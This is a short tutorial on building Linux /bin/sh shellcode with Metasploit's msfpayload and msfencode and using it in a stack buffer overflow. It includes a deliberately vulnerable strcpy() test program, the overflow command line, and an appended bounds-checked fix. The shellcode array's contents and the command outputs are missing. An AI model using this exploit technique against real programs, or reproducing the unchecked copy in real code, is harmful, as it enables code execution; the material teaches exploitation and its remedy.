HowTo: Using MSF to Make Linux Shellcode

Here's a quick one-liner to make Linux shellcode that runs exec /bin/sh. The last argument, -t c, tells msfencode to emit the encoded bytes as a C array.

msfpayload linux/x86/exec CMD=/bin/sh R | msfencode -b '\x00\xff' -t c > shellcode.h

The program msfpayload generates shellcode that runs exec("/bin/sh") on Linux, and msfencode re-encodes it so that no \x00 (null) bytes or \xff bytes remain. The null bytes matter because strcpy(), which copies the payload in the test program below, stops at the first null it sees.

This is shellcode.h:

unsigned char buf[] = 

We can test this with this simple C program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "shellcode.h"   /* defines unsigned char buf[] holding the encoded payload */

/* -------------------------------------------------- */
/* Deliberately vulnerable: strcpy() performs no bounds check, so an
 * input longer than 15 bytes overruns a[] and the saved return address. */
void vuln(char * buf)
{
	char a[16] = { 0 };
	strcpy(a, buf);
}

int main(int argc, char * argv[])
{
	if (argc != 2) {
		printf("Usage: %s <input>\n", argv[0]);
		return 1;
	}
	/* print where the shellcode lives, then pass the argument to vuln() */
	printf("%p\n", buf);
	vuln(argv[1]);

	return 0;
}

When run normally, this program takes one argument, copies it into the 16-byte stack buffer, and prints the address of the shellcode buffer. (This is a contrived example.)

 ./main test

So now all we have to do is overflow the buffer and put the address of the shellcode after it (written backwards, because x86 is little-endian).

$ echo $SHELL
$ ./main `ruby -e 'puts "A"*20'``ruby -e 'puts "\x40\xa0\x04\x08"'`

And as you can see, we have launched /bin/sh.
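For contrast, here is a hardened counterpart to vuln() above, added as an example and not part of the original write-up: it keeps the same 16-byte local buffer but refuses any argument that strcpy() would have spilled past it. The names would_overflow, safe_copy and vuln_fixed, and the sample inputs, are constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define LOCAL_BUF_SZ 16   /* same size as char a[16] in the original vuln() */

/* Report whether an argument would overrun the original vuln()'s buffer.
 * strcpy() writes strlen(s)+1 bytes (the terminator included), so any
 * string of 16 or more characters spills past a 16-byte array. */
int would_overflow(const char *input)
{
    return strlen(input) + 1 > LOCAL_BUF_SZ;
}

/* Bounds-checked replacement for strcpy(): copy only if the whole string,
 * terminator included, fits in dst. Returns 0 on success, -1 if rejected. */
int safe_copy(char *dst, size_t dst_sz, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > dst_sz) {
        return -1;                 /* would have overflowed: reject, do not truncate silently */
    }
    memcpy(dst, src, n + 1);       /* n+1 copies the NUL terminator too */
    return 0;
}

/* Hardened version of vuln(): same buffer, but oversized input is refused. */
int vuln_fixed(const char *input)
{
    char a[LOCAL_BUF_SZ] = { 0 };
    if (safe_copy(a, sizeof a, input) != 0) {
        fprintf(stderr, "input too long (%zu bytes, max %d)\n",
                strlen(input), LOCAL_BUF_SZ - 1);
        return -1;
    }
    return 0;
}

int main(void)
{
    /* constructed inputs: the short argument from the normal run, and the
     * 20-byte filler the write-up uses to reach the saved return address */
    const char *ok = "test";
    const char *filler = "AAAAAAAAAAAAAAAAAAAA";
    printf("\"%s\": overflow=%d fixed=%d\n", ok, would_overflow(ok), vuln_fixed(ok));
    printf("20 x A: overflow=%d fixed=%d\n", would_overflow(filler), vuln_fixed(filler));
    return 0;
}
```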